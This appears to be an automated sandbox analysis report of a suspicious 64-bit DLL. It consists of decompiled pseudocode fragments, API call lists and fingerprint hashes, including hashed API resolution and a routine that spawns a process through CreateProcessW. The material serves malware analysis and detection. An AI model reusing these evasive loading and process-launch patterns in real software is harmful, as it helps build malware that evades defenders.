                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
                  • String ID:
                  • API String ID: 2518601019-0
                  • Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
                  • Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
                  • String ID:
                  • API String ID: 4260168601-0
                  • Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
                  • Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
                  • String ID: h
                  • API String ID: 1962595928-2439710439
                  • Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
                  • Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CloseHandle$ProcessTerminate
                  • String ID:
                  • API String ID: 1541851893-0
                  • Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
                  • Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800020DC(long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
                  				intOrPtr _t43;
                  				intOrPtr _t44;
                  				signed int _t45;
                  				long long* _t81;
                  				void* _t82;
                  				void* _t83;
                  				long long* _t84;
                  				void* _t104;
                  				long long _t108;
                  				void* _t111;
                  				void* _t112;
                  				void* _t121;
                  				int _t123;
                  				int _t126;
                  				void* _t129;
                  				CHAR* _t131;
                  
                  				_t81 = __rax;
                  				 *((long long*)(_t111 + 8)) = __rbx;
                  				 *((long long*)(_t111 + 0x18)) = _t108;
                  				 *((long long*)(_t111 + 0x20)) = __rsi;
                  				_t112 = _t111 - 0x1c0;
                  				_t109 =  *0x8000d4a0;
                  				r14d = 0;
                  				 *(_t112 + 0x1f8) = lstrlenA(_t131);
                  				memset(_t129, _t126, _t123);
                  				_t6 = _t104 + 1; // 0x1
                  				_t7 = _t129 + 2; // 0x2
                  				r11d = _t7;
                  				r8d = _t6;
                  				 *__rdx = r11w;
                  				HeapAlloc(_t104, ??);
                  				if (__rax == 0) goto 0x80002287;
                  				memcpy(??, ??, ??);
                  				_t43 =  *((intOrPtr*)(__rax));
                  				if (_t43 == dil) goto 0x80002192;
                  				if (_t43 == 0x3a) goto 0x8000218d;
                  				_t44 =  *((intOrPtr*)(__rax + 1));
                  				if (_t44 != dil) goto 0x8000217d;
                  				if (_t44 != dil) goto 0x80002195;
                  				_t121 = _t104;
                  				if (_t121 == _t104) goto 0x800021d9;
                  				_t8 = _t121 + 1; // 0x1
                  				 *_t121 = dil;
                  				if (_t8 == _t104) goto 0x800021d9;
                  				if (E000000011800038F8(_t8, __rcx, _t112 + 0x1f8) == 0) goto 0x80002279;
                  				_t45 =  *(_t112 + 0x1f8) & 0x0000ffff;
                  				asm("ror cx, 0x8");
                  				 *(__rdx + 2) = _t45;
                  				if (_t45 == 0) goto 0x80002279;
                  				E0000000118000459C(0x25fff021, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t81 == _t104) goto 0x800021f5;
                  				 *_t81();
                  				goto 0x800021f8;
                  				_t82 = _t104;
                  				if (_t82 != _t104) goto 0x8000224d;
                  				E0000000118000459C(0xb27f4910, _t82,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t82 == _t104) goto 0x8000221e;
                  				 *_t82();
                  				goto 0x80002220;
                  				if (0 != 0) goto 0x80002249;
                  				r14d = 1;
                  				E0000000118000459C(0x25fff021, _t82,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t82 == _t104) goto 0x80002241;
                  				 *_t82();
                  				goto 0x80002244;
                  				_t83 = _t104;
                  				if (_t83 != _t104) goto 0x8000224d;
                  				goto 0x8000225f;
                  				_t84 =  *((intOrPtr*)(_t83 + 0x18));
                  				 *((intOrPtr*)(__rdx + 4)) =  *((intOrPtr*)( *_t84));
                  				if (r14d == 0) goto 0x80002279;
                  				E0000000118000459C(0x9cb92d3f, _t84,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t84 == _t104) goto 0x80002279;
                  				 *_t84();
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}



















                  0x1800020dc
                  0x1800020dc
                  0x1800020e1
                  0x1800020e6
                  0x1800020f4
                  0x1800020fb
                  0x180002112
                  0x180002122
                  0x180002136
                  0x18000213b
                  0x18000213e
                  0x18000213e
                  0x180002142
                  0x18000214a
                  0x180002151
                  0x18000215d
                  0x18000216c
                  0x180002171
                  0x18000217b
                  0x180002180
                  0x180002185
                  0x18000218b
                  0x180002190
                  0x180002192
                  0x180002198
                  0x18000219a
                  0x18000219e
                  0x1800021a4
                  0x1800021b9
                  0x1800021bf
                  0x1800021c7
                  0x1800021cb
                  0x1800021d3
                  0x1800021e4
                  0x1800021ec
                  0x1800021f1
                  0x1800021f3
                  0x1800021f5
                  0x1800021fb
                  0x180002206
                  0x18000220e
                  0x18000221a
                  0x18000221c
                  0x180002222
                  0x18000222a
                  0x180002230
                  0x180002238
                  0x18000223d
                  0x18000223f
                  0x180002241
                  0x180002247
                  0x18000224b
                  0x18000224d
                  0x18000225b
                  0x180002262
                  0x18000226d
                  0x180002275
                  0x180002277
                  0x180002281
                  0x1800022a9

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlenmemcpymemset
                  • String ID: lJu
                  • API String ID: 1735321128-4100297759
                  • Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
                  • Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00000001180005DF8(long long __rbx, intOrPtr* __rcx, void* __r8) {
                  				signed long long _t88;
                  				long _t111;
                  				void* _t114;
                  				long _t117;
                  				void* _t121;
                  				void* _t122;
                  				long _t130;
                  				void* _t133;
                  
                  				 *((long long*)(_t121 + 0x18)) = __rbx;
                  				_t122 = _t121 - 0x30;
                  				_t88 =  *0x8000d4a0;
                  				r13d = 0;
                  				 *(__rcx + 0x5c) = r13d;
                  				 *(_t122 + 0x68) = r13d;
                  				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
                  				 *(_t122 + 0x60) = 4;
                  				E0000000118000459C(0x5431d47a, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e56;
                  				 *_t88();
                  				goto 0x80005e59;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e9d;
                  				_t10 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t10;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005ea0;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				 *(_t122 + 0x68) = r13d;
                  				 *(_t122 + 0x60) = r13d;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005eea;
                  				_t19 = _t122 + 0x68; // 0xa
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t19;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t133, _t130, _t111);
                  				if (_t88 == _t133) goto 0x80005fad;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005f43;
                  				_t27 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t27;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005f46;
                  				if (r13d == r13d) goto 0x80005f95;
                  				 *(_t122 + 0x60) =  *(_t122 + 0x60) >> 1;
                  				 *((intOrPtr*)(_t88 + _t88 * 2)) = r13w;
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t114, _t117);
                  				if (_t88 == _t133) goto 0x80005f8e;
                  				r8d =  *(_t122 + 0x60);
                  				r8d = r8d + 1;
                  				wcstombs(??, ??, ??);
                  				 *(__rcx + 0x20) = _t88;
                  				goto 0x80005f9d;
                  				goto 0x80005f9d;
                  				GetLastError();
                  				HeapFree(??, ??, ??);
                  				goto 0x80005fbc;
                  				goto 0x80005fbc;
                  				return GetLastError();
                  			}











                  0x180005df8
                  0x180005e04
                  0x180005e08
                  0x180005e19
                  0x180005e1f
                  0x180005e23
                  0x180005e2b
                  0x180005e31
                  0x180005e42
                  0x180005e4a
                  0x180005e52
                  0x180005e54
                  0x180005e5c
                  0x180005e6b
                  0x180005e73
                  0x180005e75
                  0x180005e7e
                  0x180005e81
                  0x180005e90
                  0x180005e99
                  0x180005e9b
                  0x180005ea3
                  0x180005ea9
                  0x180005eae
                  0x180005ebc
                  0x180005ec4
                  0x180005ec6
                  0x180005ecb
                  0x180005ece
                  0x180005ed1
                  0x180005edf
                  0x180005ee8
                  0x180005eea
                  0x180005ef8
                  0x180005f04
                  0x180005f13
                  0x180005f1b
                  0x180005f1d
                  0x180005f22
                  0x180005f28
                  0x180005f36
                  0x180005f3f
                  0x180005f41
                  0x180005f49
                  0x180005f56
                  0x180005f5a
                  0x180005f5f
                  0x180005f67
                  0x180005f73
                  0x180005f75
                  0x180005f80
                  0x180005f83
                  0x180005f88
                  0x180005f8c
                  0x180005f93
                  0x180005f95
                  0x180005fa5
                  0x180005fab
                  0x180005fb2
                  0x180005fce

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Alloc$ErrorFreeLastwcstombs
                  • String ID:
                  • API String ID: 4133724704-0
                  • Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
                  • Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 18%
                  			E00000001180003FCC(intOrPtr* __rcx) {
                  				void* __rbx;
                  				void* __rbp;
                  				long long* _t84;
                  				long long* _t85;
                  				void* _t87;
                  				intOrPtr* _t106;
                  				void* _t109;
                  
                  				_t84 =  *0x8000d4a0;
                  				_t106 = __rcx;
                  				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0;
                  				E0000000118000459C(0x3a7e805d, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000400e;
                  				 *_t84();
                  				goto 0x80004010;
                  				if (0 == 0) goto 0x80004151;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x8000414c;
                  				 *0x8000d028();
                  				if (0 != 0) goto 0x80004145;
                  				r8d = 0x1000;
                  				HeapAlloc(??, ??, ??);
                  				if (_t84 == 0) goto 0x80004133;
                  				E0000000118000459C(0x3cd8e449, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000408d;
                  				r8d = 0x1000;
                  				r8d =  <  ?  *((void*)(_t109 + 0x50)) : r8d;
                  				 *_t84();
                  				goto 0x8000408f;
                  				if (0 == 0) goto 0x800040b7;
                  				r8d =  *(_t109 + 0x58);
                  				r9d = 0;
                  				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60))));
                  				 *((intOrPtr*)(_t85 + 0x20))();
                  				r11d =  *(_t109 + 0x58);
                  				 *((intOrPtr*)(_t109 + 0x50)) =  *((intOrPtr*)(_t109 + 0x50)) - r11d;
                  				if (0 == 0) goto 0x800040bf;
                  				goto 0x80004059;
                  				GetLastError();
                  				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
                  				E0000000118000459C(0x3a7e805d, _t85,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t85 == 0) goto 0x800040ef;
                  				 *_t85();
                  				goto 0x800040f1;
                  				if (0 == 0) goto 0x80004101;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x80004110;
                  				goto 0x80004059;
                  				GetLastError();
                  				goto 0x80004110;
                  				HeapFree(??, ??, ??);
                  				if (0x102 != 0) goto 0x80004138;
                  				E000000011800085E4(_t87, __rcx,  *((intOrPtr*)(_t109 + 0x60)));
                  				goto 0x80004138;
                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60)))) + 0x10))();
                  				goto 0x80004166;
                  				goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000008;
                  				goto 0x80004166;
                  				if (GetLastError() != 0x2efe) goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000000;
                  				return 0;
                  			}










                  0x180003fda
                  0x180003fe1
                  0x180003fef
                  0x180003ff7
                  0x180003fff
                  0x18000400a
                  0x18000400c
                  0x180004012
                  0x18000401c
                  0x18000402e
                  0x180004036
                  0x18000403e
                  0x180004047
                  0x180004053
                  0x180004062
                  0x18000406a
                  0x180004070
                  0x180004083
                  0x180004089
                  0x18000408b
                  0x180004091
                  0x180004098
                  0x18000409d
                  0x1800040a0
                  0x1800040a6
                  0x1800040a9
                  0x1800040ae
                  0x1800040b3
                  0x1800040b5
                  0x1800040b7
                  0x1800040cd
                  0x1800040d8
                  0x1800040e0
                  0x1800040eb
                  0x1800040ed
                  0x1800040f3
                  0x1800040fa
                  0x1800040fc
                  0x180004101
                  0x180004109
                  0x180004118
                  0x180004120
                  0x18000412a
                  0x180004131
                  0x180004140
                  0x180004143
                  0x18000414a
                  0x18000414c
                  0x18000414f
                  0x18000415e
                  0x180004160
                  0x180004172

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
                  • String ID:
                  • API String ID: 2540544816-0
                  • Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
                  • Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E000000011800091F8(void* __ecx, long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r9, signed long long* _a8, void* _a16, void* _a24) {
                  				void* _t46;
                  				long _t52;
                  				void* _t54;
                  				signed long long _t67;
                  				long long _t69;
                  				signed long long* _t73;
                  				signed long long _t80;
                  				signed long long _t87;
                  				intOrPtr _t90;
                  				struct _FILETIME* _t91;
                  				void* _t98;
                  				void* _t103;
                  				signed long long _t104;
                  				signed long long* _t105;
                  
                  				_t103 = _t98;
                  				 *((long long*)(_t103 + 0x10)) = __rbx;
                  				 *((long long*)(_t103 + 0x18)) = __rsi;
                  				 *(_t103 + 8) =  *(_t103 + 8) & 0x00000000;
                  				 *((long long*)(_t103 - 0x18)) = _t103 + 8;
                  				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
                  				_t73 = _a8;
                  				if (_t73 == 0) goto 0x8000925e;
                  				_t87 = _t73 + 0x18;
                  				 *(_t73 + 0x20) = _t87;
                  				_a8[3] = _t87;
                  				_a8[2] = __rcx;
                  				_a8[1] = __rdx;
                  				 *_a8 =  *_a8 | 0xffffffff;
                  				if (_t46 != 0) goto 0x80009327;
                  				GetSystemTimeAsFileTime(_t91);
                  				EnterCriticalSection(??);
                  				_t104 = __rcx + 0x88;
                  				_t80 =  *(_t104 + 8);
                  				_a8[3] = _t104;
                  				_a8[4] = _t80;
                  				 *_t80 =  &(_a8[3]);
                  				_t67 =  &(_a8[3]);
                  				 *(_t104 + 8) = _t67;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0x1");
                  				E00000001180006C8C(__ecx, _t67, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
                  				_a8[6] = _t67;
                  				if (_a8[6] != 0) goto 0x80009331;
                  				_t52 = GetLastError();
                  				EnterCriticalSection(??);
                  				_t105 = _a8;
                  				_t69 =  *((intOrPtr*)(_t105 + 0x20));
                  				_t90 =  *((intOrPtr*)(_t105 + 0x18));
                  				 *_t69 = _t90;
                  				 *((long long*)(_t90 + 8)) = _t69;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0xffffffff");
                  				if (_t52 == 0) goto 0x80009331;
                  				if (_a8 == 0) goto 0x80009331;
                  				E00000001180002770(_t54, _a8);
                  				return _t52;
                  			}

















                  0x1800091f8
                  0x1800091fb
                  0x1800091ff
                  0x180009208
                  0x180009214
                  0x18000921b
                  0x180009221
                  0x18000922b
                  0x18000922d
                  0x180009231
                  0x18000923a
                  0x180009243
                  0x18000924c
                  0x180009255
                  0x180009260
                  0x18000926a
                  0x180009274
                  0x18000927f
                  0x180009286
                  0x18000928a
                  0x180009293
                  0x1800092a0
                  0x1800092ac
                  0x1800092b0
                  0x1800092b4
                  0x1800092ba
                  0x1800092cf
                  0x1800092d9
                  0x1800092e7
                  0x1800092f3
                  0x1800092f5
                  0x1800092fb
                  0x180009300
                  0x180009304
                  0x18000930c
                  0x18000930f
                  0x180009313
                  0x180009319
                  0x180009320
                  0x18000932a
                  0x18000932c
                  0x180009342

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
                  • String ID:
                  • API String ID: 3478816279-0
                  • Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
                  • Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ByteCharErrorHeapLastMultiWide$AllocFree
                  • String ID:
                  • API String ID: 2267670476-0
                  • Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
                  • Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00000001180009B7C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                  				intOrPtr _v40;
                  				long long _v56;
                  				void* _t32;
                  				intOrPtr _t33;
                  				void* _t55;
                  				WCHAR* _t63;
                  				WCHAR* _t66;
                  				CHAR* _t69;
                  
                  				_t32 = _t55;
                  				 *((long long*)(_t32 + 8)) = __rbx;
                  				 *((long long*)(_t32 + 0x10)) = __rbp;
                  				 *((long long*)(_t32 + 0x18)) = __rsi;
                  				 *((long long*)(_t32 + 0x20)) = __rdi;
                  				_t33 =  *0x8000d4a0;
                  				lstrlenA(_t69);
                  				lstrlenW(_t66);
                  				lstrlenW(_t63);
                  				r8d = __rbx + _t33 + 0x12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t33 == 0) goto 0x80009c2e;
                  				_v56 = __r8;
                  				__imp__wnsprintfW();
                  				r9d = 0;
                  				r8d = 0;
                  				E00000001180006754(__rbx, __rcx, _t33, __r8, __rdx,  *0x8000d490 + 0x80011438);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009c32;
                  				return _v40;
                  			}











                  0x180009b7c
                  0x180009b7f
                  0x180009b83
                  0x180009b87
                  0x180009b8b
                  0x180009b99
                  0x180009bb6
                  0x180009bbf
                  0x180009bca
                  0x180009bd9
                  0x180009bdf
                  0x180009beb
                  0x180009c00
                  0x180009c05
                  0x180009c0b
                  0x180009c0e
                  0x180009c17
                  0x180009c26
                  0x180009c2c
                  0x180009c52

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
                  • HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
                  • wnsprintfW.SHLWAPI ref: 0000000180009C05
                    • Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
                    • Part of subcall function 0000000180006754: CreateProcessW.KERNEL32 ref: 00000001800067F7
                    • Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
                    • Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
                    • Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877
                  • HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
